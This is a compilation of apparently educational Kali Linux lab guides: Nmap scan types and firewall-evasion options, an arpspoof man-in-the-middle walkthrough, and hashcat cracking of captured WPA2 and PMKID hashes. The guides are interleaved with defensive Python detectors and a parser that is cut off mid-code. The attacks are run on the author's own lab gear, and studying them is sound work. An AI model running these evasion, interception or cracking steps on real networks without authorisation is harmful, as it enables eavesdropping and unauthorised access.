Nmap done: 1 IP address (1 host up) scanned in 6.29 seconds

The -sN switch scans the target with a NULL scan, which sends a packet without any flags set. If the NULL packet is sent to an open port, there will be no response back. If it is sent to a closed port, the target responds with a RST packet. This type of scan is easy to detect because there is no legitimate reason to send a TCP packet without any flag set.

When using the NULL scan the target responds similarly to the FIN and Xmas scans.

The -sA switch sends a packet with the ACK flag set when scanning a host; when the target receives the ACK packet it replies with a RST packet. If the port is closed and the firewall is enabled, the firewall blocks the target host’s response and nothing comes back.

Observe the output in nmap when the firewall is enabled.

nmap -sA 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 19:36 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0010s latency).
All 1000 scanned ports on 192.168.100.11 are filtered

Nmap done: 1 IP address (1 host up) scanned in 27.58 seconds

If the firewall is enabled, the line “All 1000 scanned ports on 192.168.100.11 are filtered” comes back with the “filtered” value. The “filtered” response shows that a firewall is enabled on the system.

Running the same command against a target with a disabled firewall, the output will have a different value.

nmap -sA 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 19:39 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0013s latency).
All 1000 scanned ports on 192.168.100.11 are unfiltered

Nmap done: 1 IP address (1 host up) scanned in 7.23 seconds

The line “All 1000 scanned ports on 192.168.100.11 are unfiltered” now comes back with the “unfiltered” value, which means that there is no firewall enabled on the target.
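The handshake differences described for -sT, -sS and the inverse scans are exactly what an IDS keys on: a SYN answered by SYN+ACK and then reset instead of acknowledged, a bare FIN, a packet with no flags at all, or FIN+PSH+URG together. As an added example (my own code, not from the guide or from Nmap), the following block groups a constructed packet log into connections, classifies each probe from the flags the client sent, and raises an alert for any client probing many ports of one host. The packet tuple format and the 10-port threshold are assumptions chosen for the demonstration.

```python
from collections import Counter, defaultdict


def probe_signature(client_flags):
    """Classify one connection attempt from the flags the client sent, in order.

    Each element is a frozenset of TCP flag letters (S, A, F, R, P, U)."""
    first = client_flags[0]
    if first == frozenset():
        return "NULL scan"                # no flags at all: never legitimate
    if first == frozenset("F"):
        return "FIN scan"                 # FIN without a prior handshake
    if first == frozenset("FPU"):
        return "Xmas scan"                # FIN+PSH+URG lit up together
    if first == frozenset("A"):
        return "ACK scan"                 # bare ACK with no connection
    if first == frozenset("S"):
        # A real client (or -sT) follows the SYN with an ACK; -sS sends RST instead.
        completed = any("A" in f and "S" not in f for f in client_flags[1:])
        return "connect scan" if completed else "SYN (half-open) scan"
    return "other"


def group_connections(packets):
    """Group packets as {(client, server): {server_port: [client flagsets]}}.

    The client is whoever sent the first packet of an endpoint pair, so the
    target's replies are attached to the scanner's connection instead of being
    counted as probes coming from the target."""
    conns = {}
    for src, dst, sport, dport, flags in packets:
        key = frozenset({(src, sport), (dst, dport)})
        if key not in conns:
            conns[key] = (src, dst, dport, [])
        client, _server, _port, sent = conns[key]
        if src == client:
            sent.append(frozenset(flags))
    by_pair = defaultdict(dict)
    for client, server, server_port, sent in conns.values():
        by_pair[(client, server)][server_port] = sent
    return by_pair


def detect_port_scans(packets, min_ports=10):
    """Alert on any client that probed at least `min_ports` distinct ports on
    one server, naming the dominant probe type."""
    alerts = []
    for (client, server), ports in group_connections(packets).items():
        if len(ports) < min_ports:
            continue
        kinds = Counter(probe_signature(sent) for sent in ports.values() if sent)
        alerts.append({"scanner": client, "target": server,
                       "ports_probed": len(ports), "kind": kinds.most_common(1)[0][0]})
    return sorted(alerts, key=lambda a: a["scanner"])


def build_sample_packets():
    """Constructed packet log: (src, dst, sport, dport, flags), in capture order."""
    target, open_ports = "192.168.100.11", {53, 88, 135, 139, 389, 445, 3389}
    pkts = []
    # -sS style half-open scan of 20 ports from .50
    for i, port in enumerate([22, 25, 53, 80, 88, 110, 135, 139, 143, 389,
                              443, 445, 465, 587, 636, 993, 995, 3268, 3269, 3389]):
        sport = 40000 + i
        pkts.append(("192.168.100.50", target, sport, port, "S"))
        if port in open_ports:
            pkts.append((target, "192.168.100.50", port, sport, "SA"))
            pkts.append(("192.168.100.50", target, sport, port, "R"))
        else:
            pkts.append((target, "192.168.100.50", port, sport, "RA"))
    # -sN style NULL scan of 12 ports from .51 (closed ports answer RST+ACK)
    for i, port in enumerate([21, 22, 23, 25, 80, 110, 143, 443, 465, 587, 993, 995]):
        pkts.append(("192.168.100.51", target, 50000 + i, port, ""))
        pkts.append((target, "192.168.100.51", port, 50000 + i, "RA"))
    # an ordinary client completing two connections: stays below the threshold
    for i, port in enumerate([445, 3389]):
        sport = 60000 + i
        pkts += [("10.0.0.5", target, sport, port, "S"), (target, "10.0.0.5", port, sport, "SA"),
                 ("10.0.0.5", target, sport, port, "A"), ("10.0.0.5", target, sport, port, "FA")]
    return pkts


if __name__ == "__main__":
    for alert in detect_port_scans(build_sample_packets()):
        print(alert)
```

A firewall that drops the inverse-scan probes changes nothing for this detector: it only looks at what the scanning host sent, which is why the "open|filtered" result you saw with the firewall enabled is still a logged scan from the defender's side.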

Firewall Evasion

Description            | Command
-----------------------+------------------------------------------
Idle zombie scan       | nmap -sI [zombie] [target]
Use a decoy            | nmap -D RND:[number] [target]
Fragment packets       | nmap -f [target]
Specify MTU            | nmap --mtu [MTU] [target]
Randomize scan order   | nmap --randomize-hosts [target]
Send bad checksums     | nmap --badsum [target]
Specify source port    | nmap --source-port [port] [target]
Spoof MAC address      | nmap --spoof-mac [MAC|0|vendor] [target]

The -sI switch is called an idle scan or zombie scan and is a stealth technique: the packets received on the scanned host cannot be traced back to the sender, because all probe traffic to the target host is attributed to a second host on the network, called the “zombie”.

For a more detailed explanation of how the idle scan works I recommend reading the official nmap documentation at https://nmap.org/book/idlescan.html

The -f switch fragments the probes into 8-byte IP fragments, so the TCP header is split over several packets; it is an effective way to hide the scan and make it harder for intrusion detection systems to detect it.

The -D switch hides port scans by using one or more decoy IP addresses; the network traffic on the scanned host will appear to come from the decoy IP addresses as well.

The --source-port switch manually specifies the source port number of a probe.

The --randomize-hosts switch randomizes the scanning order of the specified ping sweep or range scan.

Script Engines

Description                     | Command
--------------------------------+------------------------------------------
Run script                      | nmap --script [script.nse] [target]
Run scripts                     | nmap --script [expression] [target]
Run scripts by category         | nmap --script [cat] [target]
Run multiple script categories  | nmap --script [cat1,cat2,cat3] [target]
Update script database          | nmap --script-updatedb

Script categories: all, discovery, default, auth, external, malware, vuln, intrusive, safe

Useful scans

Find information about an IP address

nmap --script=asn-query,whois,ip-geolocation-maxmind [target]

Detect the Heartbleed SSL vulnerability

nmap -sV -p 443 --script=ssl-heartbleed [target]

Scan for DDoS reflection UDP services

nmap -sU -A -Pn -n -pU:19,53,123,161 --script=ntp-monlist,dns-recursion,snmp-sysdescr [target]

Scan HTTP Service

Get page titles

nmap --script=http-title [target]

Get HTTP headers

nmap --script=http-headers [target]

Recommended sites

https://highon.coffee/blog/nmap-cheat-sheet/

Conclusion

We have looked into some of the scanning techniques we can use with nmap.

Check out the Ethical Hacking notes for more Kali Linux quick guides.




How To Setup A Man In The Middle Attack Using ARP Poisoning

A Man In The Middle Attack (MITM) enables the attacker to eavesdrop on and alter the communication between two parties. The attacker redirects the flow of packets from any client on the network to the attacker’s machine, so that every packet sent to or from the victim passes through the attacker’s machine.

In this lab we will show you how to set up a man in the middle attack (MITM) using ARP poisoning. The ARP poisoning attack allows us to intercept communications across a network, which lets us sniff any traffic going from the target machine to the internet or to a server on the intranet. Any unencrypted communication will be readable to us.

ARP poisoning takes advantage of the ARP protocol function that lets any device send ARP reply packets to other devices on the same subnet and force them to update their ARP cache tables with new values. The attack tricks the target into thinking it is communicating with a new router, while in reality all communication goes through the attacker.

We will use arpspoof, a utility in Kali Linux that sends a stream of unrequested ARP responses to a target machine, telling it that the MAC address of the router has changed to our MAC address. We will use Wireshark to sniff the network traffic coming from our target client.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

Preparation For The Lab

It is recommended that you have some understanding of how ARP works and how clients communicate over layer 2 of the OSI model before you do the exercise.

For this exercise we install two client machines running on VirtualBox or VMware Workstation Player. We set up an attacker client running Kali Linux and a target client running Windows 7; both clients have IP addresses on the same LAN.

Client   | IP Address       | Gateway
---------+------------------+--------------
Attacker | 172.168.10.60/24 | 172.168.10.2
Target   | 172.168.10.70/24 | 172.168.10.2

Start The ARP Poisoning Attack

Firstly we need to enable IP forwarding on the Kali Linux (attacker) client, so that the packets we intercept are still forwarded to the real gateway. Open a terminal and enable it:

sudo sysctl -w net.ipv4.ip_forward=1

The form "sudo echo 1 > /proc/sys/net/ipv4/ip_forward" only works when the shell itself is already root, because the redirection is done by the shell before sudo runs; sysctl performs the write with the elevated privileges.

Next we want to find our default gateway, the IP address of the router.

sudo ip route

root@GalaxyS9:~# sudo ip route
default via 172.168.10.2 dev eth0 proto static metric 100
172.168.10.0/24 dev eth0 proto kernel scope link src 172.168.10.60 metric 100
root@GalaxyS9:~#

The default route for my lab router is 172.168.10.2

Next we need to know the name of the interface we want to perform the attack on. We will use the wired connection eth0. Display the connected network interfaces with “ifconfig”.

root@GalaxyS9:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.168.10.60  netmask 255.255.255.0  broadcast 172.168.10.255
        inet6 fe80::20c:29ff:fed0:e17a  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:d0:e1:7a  txqueuelen 1000  (Ethernet)
        RX packets 512418  bytes 723638885 (690.1 MiB)
        RX errors 0  dropped 276  overruns 0  frame 0
        TX packets 214518  bytes 14530991 (13.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 254  bytes 25816 (25.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 254  bytes 25816 (25.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 3e:9d:73:0e:ef:85  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root@GalaxyS9:~#

Now we can start our attack by starting arpspoof. Type arpspoof -h to display the help menu.

sudo arpspoof -i [Network Interface] -t [Target] -r [Default Gateway] 

sudo arpspoof -i eth0 -t 172.168.10.70 -r 172.168.10.2

The arpspoof utility will now proceed to send a load of unrequested ARP responses to the target, telling it that the address of the router has changed to our address.

root@GalaxyS9:~# sudo arpspoof -i eth0 -t 172.168.10.70 -r 172.168.10.2
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a

We need to keep sending the ARP replies for as long as the attack is ongoing; if you stop sending them, the target will eventually learn the right default gateway with the real MAC address again.
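The output above is also what an ARP-spoofing detector looks for from the defender's side: the gateway's IP suddenly announced with another MAC, and one MAC claiming to own several IPs. The added example below (my own code, not part of the guide or of arpspoof) parses lines in that format and reports both symptoms. The baseline of real MAC addresses is an assumption taken from the destination MACs in the output above, and the sample lines are copied from it.

```python
import re
from collections import defaultdict

# Format of the arpspoof lines printed above:
#   <src mac> <dst mac> 0806 <len>: arp reply <ip> is-at <mac>
ARP_REPLY_RE = re.compile(
    r"^(\S+) (\S+) 0806 \d+: arp reply (\d+\.\d+\.\d+\.\d+) is-at (\S+)$")

# Constructed sample: the first four lines of the arpspoof output above.
SAMPLE_LINES = """\
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
""".splitlines()

# Assumed baseline for the lab: the MAC addresses the gateway and the target
# really own (taken from the destination MACs in the output above).
KNOWN_HOSTS = {"172.168.10.2": "0:50:56:e4:40:82", "172.168.10.70": "0:c:29:df:35:24"}


def normalize_mac(mac):
    """Zero-pad each octet so 0:c:29:d0:e1:7a and 00:0c:29:d0:e1:7a compare equal."""
    return ":".join(part.zfill(2) for part in mac.lower().split(":"))


def parse_arp_replies(lines):
    """Yield (sender_mac, dst_mac, ip, claimed_mac) for every ARP reply line."""
    for line in lines:
        m = ARP_REPLY_RE.match(line.strip())
        if m:
            yield (normalize_mac(m.group(1)), normalize_mac(m.group(2)),
                   m.group(3), normalize_mac(m.group(4)))


def detect_arp_spoof(lines, known=None):
    """Return de-duplicated alerts for two symptoms of ARP poisoning:
    an IP whose announced MAC differs from the known (or first-seen) one, and
    one MAC announcing itself as the owner of several IPs."""
    seen = {ip: normalize_mac(mac) for ip, mac in (known or {}).items()}
    claims = defaultdict(set)   # mac -> set of IPs it has claimed
    alerts = {}                 # dedup key -> alert, kept in first-seen order
    for sender, _dst, ip, mac in parse_arp_replies(lines):
        claims[mac].add(ip)
        if ip in seen and seen[ip] != mac:
            a = alerts.setdefault(("change", ip, mac), {
                "kind": "IP-to-MAC change", "ip": ip, "expected": seen[ip],
                "claimed": mac, "sender": sender, "count": 0})
            a["count"] += 1
        else:
            seen.setdefault(ip, mac)   # learn on first sight when no baseline is given
        if len(claims[mac]) > 1:
            a = alerts.setdefault(("multi", mac), {
                "kind": "one MAC claims multiple IPs", "mac": mac, "ips": [], "count": 0})
            a["ips"] = sorted(claims[mac])
            a["count"] += 1
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_LINES, KNOWN_HOSTS):
        print(alert)
```

The same two checks are what switch features such as dynamic ARP inspection and host tools such as arpwatch implement; without a baseline the detector still catches the second symptom, since a legitimate host never announces itself as both the gateway and a client.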

Now open Wireshark on the Kali Linux client and start sniffing on eth0.

Next, open a web browser on the target machine and open your favourite home page; in this example I will open www.facebook.com. Go back to the Kali Linux client and stop the trace. Analyzing the trace will show that the target opened www.facebook.com in the browser.

Conclusion

Always use sites that have SSL encryption and never send sensitive information over public WiFi. Intrusion detection and intrusion prevention systems are the sysadmin’s best weapon, together with enterprise-grade hardware on the network.

Check out the Ethical Hacking notes for more Kali Linux quick guides.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.




How To Crack WPA/WPA2 Hash Using HashCat

How To Crack WPA/WPA2 With HashCat

This tutorial illustrates how to install and configure Hashcat on a Windows client and crack captured PMKID or .hccapx files using a wordlist (dictionary) attack.

“Hashcat is the self-proclaimed world’s fastest password recovery tool. It had a proprietary code base until 2015, but is now released as free software. Versions are available for Linux, OS X, and Windows and can come in CPU-based or GPU-based variants.”

The WPA2 handshake can be captured on a Linux-compatible client such as Kali Linux with a supported WiFi card running in VirtualBox, then converted to the right format depending on the capture method and moved over to the Windows client to be cracked.

Use the guides Capturing WPA2 and Capturing WPA2 PMKID to capture the WPA2 handshake. For this test we will use the famous “Rockyou” wordlist.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

Step 1: Download HashCat

Hashcat does not require any installation: it is a portable program, you only need to unpack the downloaded archive.

  1. First you need to download Hashcat binaries from https://hashcat.net/hashcat/
  2. Navigate to the location where you saved the downloaded file, and unzip the file

Step 2: Download Wordlist

There are numerous wordlists out on the web; for this test we are going to use the famous “rockyou”.

  1. Open the hashcat folder on your hard drive and create a new folder called “wordlist”
  2. Download the rockyou.txt wordlist from this Link.
  3. Save the downloaded file in the new folder “wordlist”

Step 3: Prepare Your Captured WPA2 Handshake

Depending on the method you used to capture the handshake, you must either convert the cap file to the hashcat 2500 hash-mode format or the PMKID file to the hashcat 16800 hash-mode format.

For how to format the files please see the guides Capturing WPA2 and Capturing WPA2 PMKID.

In this lab we are using a captured PMKID and a pcap handshake, both converted to a hashcat-readable format: “HonnyP01.hccapx” and “HonnyP02.16800”.

I’m using two different home routers from D-Link and Technicolor for this experiment; both WiFi routers are owned by me.

  • The “HonnyP01.hccapx” file is captured from the D-Link router.
  • The “HonnyP02.16800” file is captured from the Technicolor router.

Step 4: Start Hashcat

You need to run hashcat in CMD or PowerShell. In this example we will use CMD to execute our commands and crack the handshake.

Open CMD and navigate to the hashcat folder.

C:\>cd hashcat-5.1.0
C:\hashcat-5.1.0>

Type hashcat64 -h to display all options

C:\hashcat-5.1.0>hashcat64 -h

 ===+=============
  1 | CPU
  2 | GPU
  3 | FPGA, DSP, Co-Processor

- [ Workload Profiles ] -

  # | Performance | Runtime | Power Consumption | Desktop Impact
 ===+=============+=========+===================+=================
  1 | Low         |   2 ms  | Low               | Minimal
  2 | Default     |  12 ms  | Economic          | Noticeable
  3 | High        |  96 ms  | High              | Unresponsive
  4 | Nightmare   | 480 ms  | Insane            | Headless

- [ Basic Examples ] -

  Attack-          | Hash- |
  Mode             | Type  | Example command
 ==================+=======+==================================================================
  Wordlist         | $P$   | hashcat -a 0 -m 400 example400.hash example.dict
  Wordlist + Rules | MD5   | hashcat -a 0 -m 0 example0.hash example.dict -r rules/best64.rule
  Brute-Force      | MD5   | hashcat -a 3 -m 0 example0.hash ?a?a?a?a?a?a
  Combinator       | MD5   | hashcat -a 1 -m 0 example0.hash example.dict example.dict

If you still have no idea what just happened, try the following pages:

* https://hashcat.net/wiki/#howtos_videos_papers_articles_etc_in_the_wild
* https://hashcat.net/faq/

C:\hashcat-5.1.0>

Step 5: Crack WPA2

In the first example we will illustrate how to get the password from a converted pcap file (“.hccapx”).

Copy your converted file to the hashcat folder; in this example I am copying the file HonnyP01.hccapx to my hashcat folder.

Next we will start hashcat and use the wordlist rockyou, type in the parameters below in CMD.

C:\hashcat-5.1.0>hashcat64 -m 2500 -w3 HonnyP01.hccapx "wordlist\rockyou.txt"

  • hashcat64 the binary
  • -m 2500 the format type
  • -w 3 workload-profile 3
  • HonnyP01.hccapx the formatted file
  • “wordlist\rockyou.txt” the path to the wordlist

Hashcat will start processing the file, if you are successful the terminal will display the hash and the password.

Watchdog: Temperature abort trigger set to 90c

Dictionary cache hit:
* Filename..: wordlist\rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

7005312a9933d3a57065450f0749f210:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
2fed89e93e2cd63175f435db16ca75f0:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password

Here we can see that hashcat was able to match the hash to a password in the wordlist; in this lab the password to the D-Link WiFi is “password”. You can choose to let the application run through the wordlist or press “q” to quit.

Approaching final keyspace - workload adjusted.


Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA-EAPOL-PBKDF2
Hash.Target......: HonnyP01.hccapx
Time.Started.....: Fri Jan 18 20:13:27 2019 (42 secs)
Time.Estimated...: Fri Jan 18 20:14:09 2019 (0 secs)
Guess.Base.......: File (wordlist\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   230.7 kH/s (46.06ms) @ Accel:512 Loops:128 Thr:64 Vec:1
Recovered........: 18/25 (72.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 4734913/14344384 (33.01%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:24-49
Candidates.#1....: $HEX[303531313037353434] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 66c Fan: 44% Util: 97% Core:1949MHz Mem:4006MHz Bus:16

Started: Fri Jan 18 20:13:12 2019
Stopped: Fri Jan 18 20:14:10 2019

C:\hashcat-5.1.0>

You can display the cracked password with the --show option or by running the same command again; all cracked hashes are stored in “hashcat.potfile” in the hashcat folder.

To display the cracked password in CMD type the command below.

C:\hashcat-5.1.0>hashcat64 -m 2500 -w3 HonnyP01.hccapx "wordlist\rockyou.txt" --show

C:\hashcat-5.1.0>hashcat64 -m 2500 -w3 HonnyP01.hccapx "wordlist\rockyou.txt" --show
7005312a9933d3a57065450f0749f210:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
2fed89e93e2cd63175f435db16ca75f0:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
fcaf4223879e125e10a272f9234256fe:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
7617ef601966436708eae3ad2c02d295:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
8b5ddfc6bade402e38e2ce023449bf07:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
C:\hashcat-5.1.0>

In the next example we run the same command but with the 16800 mode, to run the dictionary attack against the formatted PMKID file captured from the Technicolor router.

C:\hashcat-5.1.0>hashcat64 -m 16800 -w 3 HonnyP02.16800 "wordlist\rockyou.txt"

  • hashcat64 the binary
  • -m 16800 the format type
  • -w 3 workload-profile 3
  • HonnyP02.16800 the formatted file
  • “wordlist\rockyou.txt” the path to the wordlist

17a40e5b92e3815f6111554b1c80f4d9*c4ea1d1f7d93*c498808d7d5f*4c656f6e20322e342047487a:adsladsl

Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: 17a40e5b92e3815f6111554b1c80f4d9*c4ea1d1f7d93*c4988...47487a
Time.Started.....: Fri Jan 18 23:12:55 2019 (27 secs)
Time.Estimated...: Fri Jan 18 23:13:22 2019 (0 secs)
Guess.Base.......: File (wordlist\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   268.6 kH/s (51.75ms) @ Accel:512 Loops:128 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 11008839/14344384 (76.75%)
Rejected.........: 3636039/11008839 (33.03%)
Restore.Point....: 10261572/14344384 (71.54%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: aldohizo123 -> Juelle98
Hardware.Mon.#1..: Temp: 68c Fan: 43% Util: 95% Core:1847MHz Mem:4006MHz Bus:16

Started: Fri Jan 18 23:12:48 2019
Stopped: Fri Jan 18 23:13:24 2019

C:\hashcat-5.1.0>

Here we can see that the cracked password is “adsladsl” for the Technicolor router.

C:\hashcat-5.1.0>hashcat64 -m 16800 -w 3 HonnyP02.16800 "wordlist\rockyou.txt" --show
17a40e5b92e3815f6111554b1c80f4d9*c4ea1d1f7d93*c498808d7d5f*4c656f6e20322e342047487a:adsladsl

C:\hashcat-5.1.0>
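When you run this against your own networks, the cracked lines above are the actual finding of the audit. The added example below (my own code, not hashcat's and not part of the guide) parses both the 2500 and the 16800 result formats shown above, decodes the hex-encoded ESSID of the PMKID format, and explains why each recovered passphrase counts as weak. The small common-password set is a constructed placeholder for a real list, and the two sample lines are copied from the output above.

```python
# Constructed sample: the two cracked lines shown above, one per hash mode.
SAMPLE_CRACKED = [
    "7005312a9933d3a57065450f0749f210:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password",
    "17a40e5b92e3815f6111554b1c80f4d9*c4ea1d1f7d93*c498808d7d5f*4c656f6e20322e342047487a:adsladsl",
]

# Tiny constructed set standing in for a real common-password list.
COMMON_PASSWORDS = {"password", "12345678", "qwerty123", "admin123"}


def format_mac(raw):
    """84c9b26a9e90 -> 84:c9:b2:6a:9e:90"""
    return ":".join(raw[i:i + 2] for i in range(0, 12, 2))


def parse_cracked_line(line):
    """Parse one hashcat result line in 2500 (hccapx) or 16800 (PMKID) format."""
    head = line.split(":", 1)[0]
    if "*" in head:
        # 16800: pmkid*ap_mac*client_mac*essid_hex:password (the hash part has no colons)
        hash_part, _, password = line.partition(":")
        _pmkid, ap, client, essid_hex = hash_part.split("*")
        essid = bytes.fromhex(essid_hex).decode("utf-8", "replace")
        mode = 16800
    else:
        # 2500: hash:ap_mac:client_mac:essid:password; maxsplit keeps any ':' in the password
        _digest, ap, client, essid, password = line.split(":", 4)
        mode = 2500
    return {"mode": mode, "essid": essid, "ap": format_mac(ap),
            "client": format_mac(client), "password": password}


def assess_password(pw):
    """Return the reasons a recovered passphrase counts as weak (empty list = none found)."""
    issues = []
    if len(pw) < 12:
        issues.append("shorter than 12 characters")
    if pw.lower() in COMMON_PASSWORDS:
        issues.append("in common-password list")
    classes = sum(any(f(c) for c in pw) for f in
                  (str.islower, str.isupper, str.isdigit, lambda c: not c.isalnum()))
    if classes < 3:
        issues.append("fewer than 3 character classes")
    half = len(pw) // 2
    if half and len(pw) % 2 == 0 and pw[:half] == pw[half:]:
        issues.append("repeated pattern")   # e.g. adsladsl = adsl twice
    return issues


def audit(lines):
    """Turn cracked lines into per-network findings for a WiFi password review."""
    findings = []
    for line in lines:
        rec = parse_cracked_line(line.strip())
        rec["issues"] = assess_password(rec["password"])
        findings.append(rec)
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_CRACKED):
        print(f["essid"], f["ap"], f["password"], f["issues"])
```

Point `audit` at the lines from `--show` (or at hashcat.potfile) and every network whose passphrase came back with issues is one whose PSK should be rotated to a long, non-dictionary phrase.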

Extra: Brute Force Attack And Rule-Based Attack

You can let hashcat brute force the file with a mask attack (-a 3) using the command below; the mask ?l?l?l?l?l?l?l?l tries every combination of eight lowercase letters. Without -a 3 hashcat defaults to a straight wordlist attack and would treat the mask as a wordlist filename.

C:\hashcat-5.1.0>hashcat64 -m 16800 -w 3 -a 3 HonnyP02.16800 ?l?l?l?l?l?l?l?l

Or use a rule-based attack, which applies every rule in best64.rule to each wordlist entry. The hash file must still be given before the wordlist.

C:\hashcat-5.1.0>hashcat64 -m 16800 -w 3 -r rules\best64.rule HonnyP02.16800 "wordlist\rockyou.txt"
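
To see what a mode 16800 line actually contains, and to put numbers behind the conclusion below about passphrase strength, here is an added Python example (not code from the tutorial or from hashcat). It decodes a 16800 line into the PMKID, the AP and client MACs and the ESSID, and computes the keyspace of a hashcat mask together with the time an exhaustive run would take. The two hash lines are the ones shown in this guide, the charset sizes are hashcat's built-in ?l ?u ?d ?s ?a ?h ?H charsets, and 268.6 kH/s is the speed from the status screen above; custom charsets (?1 to ?4) are not handled.

```python
"""Decode hashcat mode 16800 (WPA-PMKID-PBKDF2) lines and size a mask attack.

Added example; it is not code from the tutorial or from hashcat.  CRACKED_LINE
is the line the tutorial cracked with --show, CAPTURED_LINE is the one written
by hcxpcaptool later in the same guide, and the speed is the tutorial's
268.6 kH/s.
"""
from dataclasses import dataclass
from typing import Optional

# Sizes of hashcat's built-in mask charsets (?l ?u ?d ?s ?a ?h ?H).
CHARSET_SIZES = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95, "h": 16, "H": 16}

CRACKED_LINE = ("17a40e5b92e3815f6111554b1c80f4d9*c4ea1d1f7d93*c498808d7d5f"
                "*4c656f6e20322e342047487a:adsladsl")
CAPTURED_LINE = "4a12770f5a10315f7a8a6e9cd311c9ca*1cb72c843c70*b0ca68623d4f*506f6e747553"
TUTORIAL_SPEED_HPS = 268_600.0   # "268.6 kH/s" from the status screen


@dataclass
class PmkidRecord:
    pmkid: str                  # 128-bit HMAC-SHA1 tag over "PMK Name"|AP|STA, hex
    ap_mac: str                 # BSSID of the access point
    sta_mac: str                # MAC of the client that sent the association request
    essid: str                  # network name, decoded from the hex field
    passphrase: Optional[str]   # only present on cracked (--show) lines


def _mac(hex12: str) -> str:
    """'c4ea1d1f7d93' -> 'C4:EA:1D:1F:7D:93'."""
    return ":".join(hex12[i:i + 2] for i in range(0, 12, 2)).upper()


def parse_16800(line: str) -> PmkidRecord:
    """Parse 'PMKID*APMAC*STAMAC*ESSIDHEX[:passphrase]' as written by hcxpcaptool -z."""
    hash_part, sep, passphrase = line.strip().partition(":")
    fields = hash_part.split("*")
    if len(fields) != 4:
        raise ValueError(f"expected 4 '*'-separated fields, got {len(fields)}")
    pmkid, ap, sta, essid_hex = fields
    if len(pmkid) != 32 or len(ap) != 12 or len(sta) != 12:
        raise ValueError("PMKID must be 32 hex chars and each MAC 12 hex chars")
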